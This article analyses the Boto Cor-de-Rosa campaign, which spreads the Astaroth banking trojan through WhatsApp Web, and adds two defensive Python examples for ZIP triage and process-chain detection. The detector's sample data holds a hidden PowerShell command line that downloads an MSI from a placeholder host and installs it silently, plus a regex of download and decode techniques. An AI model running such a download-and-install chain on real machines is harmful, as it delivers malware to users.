A new malware campaign, dubbed Boto Cor-de-Rosa, is abusing WhatsApp Web to spread the Astaroth banking trojan to Windows users, primarily in Brazil. Each infected machine harvests the victim's WhatsApp contact list and automatically sends the malicious archive to every contact, so the campaign sustains its own infection loop without further attacker involvement.
The campaign has two objectives: to propagate as widely as possible and to steal sensitive user credentials. Acronis researchers, who analyzed the campaign, found that it relies on persuasive social engineering to get victims to execute a malicious file. Because propagation runs automatically through WhatsApp Web rather than through attacker-controlled mail or web infrastructure, outbreaks are harder to contain: the messages arrive from accounts the recipients already know.
Understanding the Boto Cor-de-Rosa Attack Mechanism
The infection chain begins when a user receives a ZIP file over WhatsApp Web, sent from the account of a contact whose own machine is already infected. The archives carry names that mimic an ordinary file transfer, such as "552516107-a9af16a8-552.zip", to reduce suspicion. Inside is a VBScript (.vbs) file presented as an ordinary document; it is the initial stage of the malware, and it runs the moment the victim double-clicks it, because Windows hands .vbs files to the Windows Script Host by default.
Once executed, the VBS script downloads two components. The first is the core Astaroth banking trojan, written in Delphi, which carries out the credential theft. The second is a Python-based module engineered to act as the WhatsApp spreader; it is what makes the propagation automatic rather than attacker-driven.
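As an added example (not code from the Acronis report or from the campaign), the following Python script triages an incoming ZIP the way a messaging gateway or an endpoint hook could, holding any archive that carries a Windows script file. The extension list, the archive-name pattern derived from the one name quoted above, and the 50-100 KB size band reported for the downloader are assumptions drawn from this page; the sample archive is constructed in memory and contains only filler text.

```python
import io
import re
import zipfile

# Extensions Windows will hand to the Script Host or the shell on double-click.
# Assumption: a starting list for a gateway policy, not an exhaustive one.
SCRIPT_EXTENSIONS = {
    ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
    ".ps1", ".bat", ".cmd", ".lnk", ".scr",
}

# Weak indicator derived from the single archive name the report quotes
# (552516107-a9af16a8-552.zip): digits, eight hex characters, digits.
CAMPAIGN_NAME_RE = re.compile(r"^\d{6,}-[0-9a-f]{8}-\d{3}\.zip$", re.IGNORECASE)

# Size band the report gives for the obfuscated VBS downloader.
DOWNLOADER_MIN, DOWNLOADER_MAX = 50 * 1024, 100 * 1024


def _extension(name):
    """Lower-cased final extension of a member path ('' if it has none)."""
    base = name.rsplit("/", 1)[-1].lower()
    return base[base.rfind("."):] if "." in base else ""


def triage_zip(archive_name, data):
    """Inspect a ZIP's central directory without extracting anything.

    Returns a dict with the member list, a 'hold' verdict and the reasons.
    Strong reasons (a script file inside) hold the archive on their own;
    weak notes (name pattern, size band) only add context for the analyst.
    """
    strong, weak, members = [], [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            members.append((info.filename, info.file_size))
            ext = _extension(info.filename)
            if ext not in SCRIPT_EXTENSIONS:
                continue
            strong.append(f"script member {info.filename} ({ext})")
            base = info.filename.rsplit("/", 1)[-1]
            if base.count(".") > 1:  # e.g. comprovante.pdf.vbs
                strong.append(f"double extension on {info.filename}")
            if DOWNLOADER_MIN <= info.file_size <= DOWNLOADER_MAX:
                weak.append(f"{info.filename} is in the 50-100 KB band of the downloader")
    if CAMPAIGN_NAME_RE.match(archive_name):
        weak.append("archive name matches the reported transfer-like pattern")
    return {
        "archive": archive_name,
        "members": members,
        "hold": bool(strong),
        "reasons": strong + weak,
    }


def build_sample_archive(member_name, size):
    """Constructed sample: a ZIP holding one member of the given size (filler only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # Ten-byte filler lines stand in for the obfuscated script body.
        zf.writestr(member_name, ("' filler\r\n" * (size // 10 + 1))[:size])
    return buf.getvalue()


if __name__ == "__main__":
    bad = build_sample_archive("comprovante.pdf.vbs", 64 * 1024)
    good = build_sample_archive("comprovante.pdf", 64 * 1024)
    print(triage_zip("552516107-a9af16a8-552.zip", bad))
    print(triage_zip("fotos.zip", good))
```

The verdict rests only on the presence of a script member; the name pattern and size band are deliberately weak, because both are trivial for the operators to change between waves.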
The social engineering employed by the Astaroth campaign is refined. According to Acronis researchers, the Python spreader module checks the local time of day to pick an appropriate greeting and composes a personalized message in Portuguese. The messages are written to sound friendly and helpful, often reading something like, "Segue o arquivo solicitado. Qualquer dúvida estou à disposição!" This translates to, "Here is the requested file. If you have any questions, I'm available!" Because the message comes from a known contact and uses familiar, reassuring language, recipients are far more likely to trust the attached file and run it.
Technical Details of Malware Propagation and Payload Delivery
The propagation module keeps running statistics on its own spreading activity: successful message deliveries, failed attempts, and the sending rate in messages per minute. This lets the operators tune the campaign and judge how far it has reached.
It also emits a progress update after every 50 messages sent, reporting the percentage of the contact list processed so far and the current throughput, which gives the operators a granular view of the campaign's momentum.
The initial VBS downloader inside the ZIP archive is typically between 50 and 100 KB and is heavily obfuscated to evade antivirus and other security products. Once deobfuscated, the script is seen to run PowerShell commands that download the next-stage components from compromised domains; researchers identified coffe-estilo.com as one host in this infrastructure. A script host (wscript.exe or cscript.exe) spawning PowerShell is itself a strong detection signal, since few legitimate workflows do that.
The downloaded payload is typically packaged as an MSI installer, which deploys its files to a hidden directory named to look like a Microsoft Edge cache folder ("C:MicrosoftEdgeCache6.60.2.9313" as reproduced here, with its path separators lost). That directory holds an executable named electron.exe together with a set of DLLs that between them make up the Astaroth banking payload. Because the directory is marked hidden, it does not appear in Explorer or in a plain dir listing unless hidden items are shown (dir /a). The malware then lies dormant, awaiting further instructions or the start of its credential-stealing routine.
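The following Python is an added example, not code from the report or the campaign, showing how the three stages described above (a script host launching PowerShell to download, msiexec installing the package, electron.exe running from an unusual directory) can be tied together over process-creation telemetry such as Sysmon event ID 1. The sample events are constructed, the download-indicator list and the trusted install roots are assumptions, and the directory in the sample merely stands in for the hidden cache-style folder the report describes.

```python
import re

# Process images that execute user-supplied scripts, and the PowerShell hosts.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that fetch or decode a payload. Assumption: a starting
# set tuned for the DownloadFile / Invoke-WebRequest style of downloader.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"net\.webclient|start-bitstransfer|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)

# Roots under which an Electron-based application would normally be installed.
# Assumption: adjust to the software inventory of the environment.
TRUSTED_ROOTS = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "\\appdata\\local\\programs\\",
)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event, by_pid):
    """Image basenames of the parent, grandparent, ... (guards against pid-reuse loops)."""
    seen, pid, chain = set(), event["ppid"], []
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, reason) tuples for events that match one of the three stages."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = _basename(e["image"])
        chain = ancestry(e, by_pid)
        # Stage 1: the VBS downloader running PowerShell to fetch the next stage.
        if (image in POWERSHELL and chain and chain[0] in SCRIPT_HOSTS
                and DOWNLOAD_RE.search(e["cmdline"])):
            alerts.append((e["pid"], "script host spawned PowerShell with download/decode indicators"))
        # Stage 2: the MSI package installed from inside that chain.
        if image == "msiexec.exe" and any(p in SCRIPT_HOSTS | POWERSHELL for p in chain):
            alerts.append((e["pid"], "msiexec launched under a script-host/PowerShell ancestry"))
        # Stage 3: electron.exe executing from somewhere no installer would put it.
        if image == "electron.exe" and not any(r in e["image"].lower() for r in TRUSTED_ROOTS):
            alerts.append((e["pid"], "electron.exe running outside known install roots"))
    return alerts


# Constructed sample events (Sysmon event ID 1 fields, reduced). Pids, paths and
# the download URL are invented for the example; only the chain mirrors the report.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\ana\\Downloads\\552516107-a9af16a8-552\\comprovante.vbs"'},
    {"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/p.msi','C:\\Users\\ana\\AppData\\Local\\Temp\\p.msi')\""},
    {"pid": 400, "ppid": 300, "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec /i C:\\Users\\ana\\AppData\\Local\\Temp\\p.msi /qn"},
    {"pid": 500, "ppid": 400, "image": "C:\\ProgramData\\Cache\\6.60.2.9313\\electron.exe",
     "cmdline": "electron.exe"},
    # Benign controls: an admin fetching a tool from a console, and a real Electron app.
    {"pid": 600, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
    {"pid": 700, "ppid": 100, "image": "C:\\Users\\ana\\AppData\\Local\\Programs\\notes-app\\electron.exe",
     "cmdline": "electron.exe"},
]

if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

The first rule keys on the parent being a script host rather than on the download cmdlet alone, which is why the administrator's Invoke-WebRequest from an Explorer-launched console (pid 600) stays quiet while the same cmdlet under wscript.exe fires. Stage 3 is a weak rule on its own; it is the co-occurrence with the first two on one host that makes it worth paging on.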
The Boto Cor-de-Rosa campaign is a reminder of how quickly attacker tradecraft adapts. By building propagation into a consumer application such as WhatsApp Web, the operators get an infection vector that rides on trust between contacts and leaves little attacker-owned infrastructure to trace. Users should treat any unexpected file received over a messaging platform with suspicion, however familiar the sender, and keep their security software current. Administrators can cut off the initial stage by stopping Windows Script Host from running user-downloaded scripts (for example, by changing the default handler for .vbs files to a text editor or by blocking wscript.exe for standard users) and by alerting on PowerShell spawned from a script host.

